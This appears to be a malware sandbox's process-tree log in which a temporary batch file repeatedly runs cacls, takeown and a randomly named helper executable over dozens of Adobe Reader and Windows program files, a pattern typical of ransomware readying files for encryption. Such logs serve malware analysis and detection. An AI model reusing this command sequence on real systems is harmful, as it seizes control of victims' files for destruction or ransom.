-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:1852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
PID:824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "WinMail.exe" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:1536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "license.html" -nobanner3⤵PID:1992
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "license.html" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:1796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵
- Modifies file permissions
PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "forms_received.gif" -nobanner3⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "forms_received.gif" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:1260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "submission_history.gif" -nobanner3⤵PID:396
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "submission_history.gif" -nobanner4⤵PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:1796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Identity-H" -nobanner3⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Identity-H" -nobanner4⤵PID:572
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:1820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:1084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:1568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "brt32.clx" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "brt32.clx" -nobanner4⤵PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "usa.fca" -nobanner3⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "usa.fca" -nobanner4⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:1856
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:1812
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:1916
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:1144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
- Modifies file permissions
PID:572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:1852
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "background.png" -nobanner3⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "background.png" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵PID:992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:1992
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:1852
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵PID:1920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"3⤵
- Modifies file permissions
PID:1768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Genko_2.jtp" -nobanner3⤵PID:788
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Genko_2.jtp" -nobanner4⤵PID:1284
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1568
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "wab.exe" -nobanner3⤵PID:828
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "wab.exe" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵
- Modifies file permissions
PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1852
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:1480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "RTC.der" -nobanner3⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "RTC.der" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:1072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵
- Modifies file permissions
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "end_review.gif" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "end_review.gif" -nobanner4⤵PID:1856
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:1876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵
- Modifies file permissions
PID:780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:744
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "server_ok.gif" -nobanner3⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "server_ok.gif" -nobanner4⤵PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:396
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "warning.gif" -nobanner3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "warning.gif" -nobanner4⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:1804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:780
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:1228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵PID:396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "brt.hyp" -nobanner3⤵PID:1696
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "brt.hyp" -nobanner4⤵PID:1856
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵
- Modifies file permissions
PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "eng32.clx" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "eng32.clx" -nobanner4⤵PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:1596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1820
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1028
-
-
-
